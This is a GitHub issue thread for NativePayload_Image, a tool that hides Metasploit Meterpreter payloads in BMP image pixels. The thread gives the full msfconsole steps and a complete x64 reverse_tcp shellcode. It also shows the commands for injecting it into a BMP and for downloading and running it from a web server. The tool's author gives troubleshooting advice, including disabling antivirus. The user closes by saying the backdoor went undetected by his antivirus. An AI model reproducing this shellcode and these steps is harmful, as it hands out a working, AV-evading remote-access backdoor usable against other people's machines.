search

DamonMohammadbagher / NativePayload_Image

Transferring Backdoor Payloads with BMP Image Pixels
79 stars 37 forks source link

Open a .bmp file and nothing happens? #1

Closed Ciangi closed 7 years ago

Ciangi commented 7 years ago

" step1 : msfconsole step2 : msf > use payload/windows/x64/meterpreter/reverse_tcp step3 : set lhost 192.168.1.104 step4 : generate finally you can use stage1 "

then

NativePayload_Image.exe create “test3.bmp” fc,48,83,e4,f0,e8,cc,00,00,00,41,51,41,50,52,51,56,48,31,d2,65,48,8b,52,60,48,8b,52,18,48,8b,52,20,48,8b,72,50,48,0f,b7,4a,4a,4d,31,c9,48,31,c0,ac,3c,61,7c,02,2c,20,41,c1,c9,0d,41,01,c1,e2,ed,52,41,51,48,8b,52,20,8b,42,3c,48,01,d0,66,81,78,18,0b,02,0f,85,72,00,00,00,8b,80,88,00,00,00,48,85,c0,74,67,48,01,d0,50,8b,48,18,44,8b,40,20,49,01,d0,e3,56,48,ff,c9,41,8b,34,88,48,01,d6,4d,31,c9,48,31,c0,ac,41,c1,c9,0d,41,01,c1,38,e0,75,f1,4c,03,4c,24,08,45,39,d1,75,d8,58,44,8b,40,24,49,01,d0,66,41,8b,0c,48,44,8b,40,1c,49,01,d0,41,8b,04,88,48,01,d0,41,58,41,58,5e,59,5a,41,58,41,59,41,5a,48,83,ec,20,41,52,ff,e0,58,41,59,5a,48,8b,12,e9,4b,ff,ff,ff,5d,49,be,77,73,32,5f,33,32,00,00,41,56,49,89,e6,48,81,ec,a0,01,00,00,49,89,e5,49,bc,02,00,11,5c,c0,a8,01,68,41,54,49,89,e4,4c,89,f1,41,ba,4c,77,26,07,ff,d5,4c,89,ea,68,01,01,00,00,59,41,ba,29,80,6b,00,ff,d5,6a,05,41,5e,50,50,4d,31,c9,4d,31,c0,48,ff,c0,48,89,c2,48,ff,c0,48,89,c1,41,ba,ea,0f,df,e0,ff,d5,48,89,c7,6a,10,41,58,4c,89,e2,48,89,f9,41,ba,99,a5,74,61,ff,d5,85,c0,74,0c,49,ff,ce,75,e5,68,f0,b5,a2,56,ff,d5,48,83,ec,10,48,89,e2,4d,31,c9,6a,04,41,58,48,89,f9,41,ba,02,d9,c8,5f,ff,d5,48,83,c4,20,5e,89,f6,6a,40,41,59,68,00,10,00,00,41,58,48,89,f2,48,31,c9,41,ba,58,a4,53,e5,ff,d5,48,89,c3,49,89,c7,4d,31,c9,49,89,f0,48,89,da,48,89,f9,41,ba,02,d9,c8,5f,ff,d5,48,01,c3,48,29,c6,48,85,f6,75,e1,41,ff,e7

[!] Making New Bitmap File ... [!] Bitmap File Name : test3.bmp [+] Creating Header for Bitmap File ... [>] Header adding (length 54) : 424d5e0e00000000000036000000280000........ [+] Injecting Meterpreter Payload to Bitmap File ... [>] Injecting Payload (length 449) : fc4883e4f0e8cc00000041514150525156........ [+] Adding Ex-Payload for Bitmap File ... [>] Ex-Payload adding (length FF * 3114). [!] File test3.bmp with length 4621 bytes Created.

then

msfconsole use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set lhost 192.168.1.104 exploit

then

cp test3.bmp /var/www/html/

then download and open file from another computer (windows x64 architecture) in local network and no one session appear...

or...

when i want to publish as url:

**./NativePayload_Image.exe url "http://192.168.1.104:81/test3.bmp" 510 54

NativePayload_Image Tool , Published by Damon Mohammadbagher , April 2017 Detecting/Injecting Meterpreter Payload bytes from BMP Image Files

[+] Detecting Meterpreter Payload bytes by Image Files [+] File Scanning .. . . [+] Reading Payloads from URL "http://192.168.1.104:81/test3.bmp"
[+] Scanning Payload with length 510 from byte 54

Bingo Meterpreter session by BMP images ;)

Unhandled Exception: System.DllNotFoundException: kernel32 at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint) at NativePayload_Image.Program.Main (System.String[] args) [0x004db] in <48012d87c7454d0b8ed5325d571ec9b6>:0 [ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: kernel32 at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint) at NativePayload_Image.Program.Main (System.String[] args) [0x004db] in <48012d87c7454d0b8ed5325d571ec9b6>:0**

could You help me please?

DamonMohammadbagher commented 7 years ago

now you need to use Backdoor again by this syntax to downloading BMP file from apache in this case your syntax is 👍

c:> NativePayload_Image.exe url "http://target_webserver_ip/test3.bmp" 449 54

note: 449 is your payload length and 54 is your header length

but your payload should be 510 i think 449 is wrong maybe .... ;)

Ciangi commented 7 years ago

msf > use payload/windows/x64/meterpreter/reverse_tcp msf payload(reverse_tcp) > set LHOST 192.168.1.104 LHOST => 192.168.1.104 msf payload(reverse_tcp) > generate windows/x64/meterpreter/reverse_tcp - 449 bytes (stage 1) http://www.metasploit.com VERBOSE=false, LHOST=192.168.1.104, LPORT=4444, ReverseAllowProxy=false, ReverseConnectRetries=5, ReverseListenerThreaded=false, PayloadUUIDTracking=false, EnableStageEncoding=false, StageEncoderSaveRegisters=, StageEncodingFallback=true, PrependMigrate=false, EXITFUNC=process, AutoLoadStdapi=true, AutoVerifySession=true, AutoVerifySessionTimeout=30, InitialAutoRunScript=, AutoRunScript=, AutoSystemInfo=true, EnableUnicodeEncoding=false, SessionRetryTotal=3600, SessionRetryWait=10, SessionExpirationTimeout=604800, SessionCommunicationTimeout=300 buf = "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50" + "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" + "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" + "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" + "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" + "\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f" + "\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0" + "\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49" + "\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6" + "\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1" + "\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8" + "\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44" + "\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41" + "\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83" + "\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9" + "\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00" + "\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49" + "\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x01\x68\x41\x54" + "\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5" + "\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b" + "\x00\xff\xd5\x6a\x05\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31" + "\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41" + "\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58" + "\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5" + "\x85\xc0\x74\x0c\x49\xff\xce\x75\xe5\x68\xf0\xb5\xa2\x56" + "\xff\xd5\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04" + "\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x48" + "\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00" + "\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4\x53" + "\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31\xc9\x49\x89" + "\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff" + "\xd5\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xe1\x41\xff" + "\xe7"

Ciangi commented 7 years ago

./NativePayload_Image.exe url "http://192.168.1.104:81/test3.bmp" 449 54

NativePayload_Image Tool , Published by Damon Mohammadbagher , April 2017 Detecting/Injecting Meterpreter Payload bytes from BMP Image Files

[+] Detecting Meterpreter Payload bytes by Image Files [+] File Scanning .. . . [+] Reading Payloads from URL "http://192.168.1.104:81/test3.bmp"
[+] Scanning Payload with length 449 from byte 54

Bingo Meterpreter session by BMP images ;)

Unhandled Exception: System.DllNotFoundException: kernel32 at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint) at NativePayload_Image.Program.Main (System.String[] args) [0x004db] in <48012d87c7454d0b8ed5325d571ec9b6>:0 [ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: kernel32 at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint) at NativePayload_Image.Program.Main (System.String[] args) [0x004db] in <48012d87c7454d0b8ed5325d571ec9b6>:0

Ciangi commented 7 years ago

I'm running on kali linux and i your .cs code compiled with mono. Is it ok? I typed: mcs -out:NativePayload_Image.exe NativePayload_Image.cs

# mono --version Mono JIT compiler version 4.6.2 (Debian 4.6.2.7+dfsg-1) Copyright (C) 2002-2014 Novell, Inc, Xamarin Inc and Contributors. www.mono-project.com TLS: __thread SIGSEGV: altstack Notifications: epoll Architecture: amd64 Disabled: none Misc: softdebug LLVM: supported, not enabled. GC: sgen

Ciangi commented 7 years ago

Oh okay .... my Mono is for .net 4.6 ...and it's not supported in your project ;D

DamonMohammadbagher commented 7 years ago

ok now tell me are you have Anti-virus ? if yes please check this without AV so disable all av features or exit that tool ;D and tell me your result now

DamonMohammadbagher commented 7 years ago

damn man yea make this project by .NET 4.0 or 3.5 hahahaahahaha

Ciangi commented 7 years ago

yep i have Avast, disabled it, opened image and nothing ... :<

Do you know how to downgrade Mono ?:( or do you know another tool to compile .cs with .net 4.0 ??

DamonMohammadbagher commented 7 years ago

just change your project properties to .NET 4.0 then it should work ;D

DamonMohammadbagher commented 7 years ago

mono , when you want make new project i think you can select .NET Framework version then you can change it to 4.0 or 3.5

DamonMohammadbagher commented 7 years ago

AND 449 in this case is correct your payload length is 449

Ciangi commented 7 years ago

unfortunately in MonoDevelop can't do this XD

what a ....

Ciangi commented 7 years ago

oh sorry ! i can change ! but for 4.5 , 4.5.1 , 4.5.2, 4.6 and 4.6.1 !! ;(

DamonMohammadbagher commented 7 years ago

in "monodevelop" tool you can change it 👍 Project options => build > general > Target framework : select mono/.NET 4.0 or gamelogic.co.za/grids/documentation-contents/how-to-set-your-target-framework-to-mono-net4-in-monodevelop/ or https://stackoverflow.com/questions/6378137/mono-how-to-change-target-framework

DamonMohammadbagher commented 7 years ago

in this link maybe you can compile your code ;) https://www.tutorialspoint.com/compile_csharp_online.php

Ciangi commented 7 years ago

not working :( but have great idea ! I run visual studio 2015 enterprise on my windows and try to compile it in .net 4 ;D

Ciangi commented 7 years ago

Okay so i tried to compile it with .net 4 or .net 4 client profile and the same .... can't establish connection :(

Ciangi commented 7 years ago

still got:

./test.exe url "http://192.168.1.104:81/test3.bmp" 449 54

NativePayload_Image Tool , Published by Damon Mohammadbagher , April 2017 Detecting/Injecting Meterpreter Payload bytes from BMP Image Files

[+] Detecting Meterpreter Payload bytes by Image Files [+] File Scanning .. . . [+] Reading Payloads from URL "http://192.168.1.104:81/test3.bmp"
[+] Scanning Payload with length 449 from byte 54

Bingo Meterpreter session by BMP images ;)

Unhandled Exception: System.DllNotFoundException: kernel32 at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint) at NativePayload_Image.Program.Main (System.String[] args) [0x0049f] in :0 [ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: kernel32 at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint) at NativePayload_Image.Program.Main (System.String[] args) [0x0049f] in :0

Ciangi commented 7 years ago

Okay i know where is a problem. reference to that page: https://www.essentialobjects.com/forum/postsm17563_Syntax-Editor-throwing-exception-on-Linux--VirtualAlloc-not-found.aspx

System.EntryPointNotFoundException: VirtualAlloc

answer: The controls are for Windows only and it uses Windows API extensively. It's not just one or two functions calls. It's everywhere. Thus it's not possible to run on Linux.

i executed the exe file on windows and works like a charm! thanks for help!

Ciangi commented 7 years ago

to be honest with you, i got first backdoor which is not detectable by my AVs :O Good job!

DamonMohammadbagher commented 7 years ago

your welcome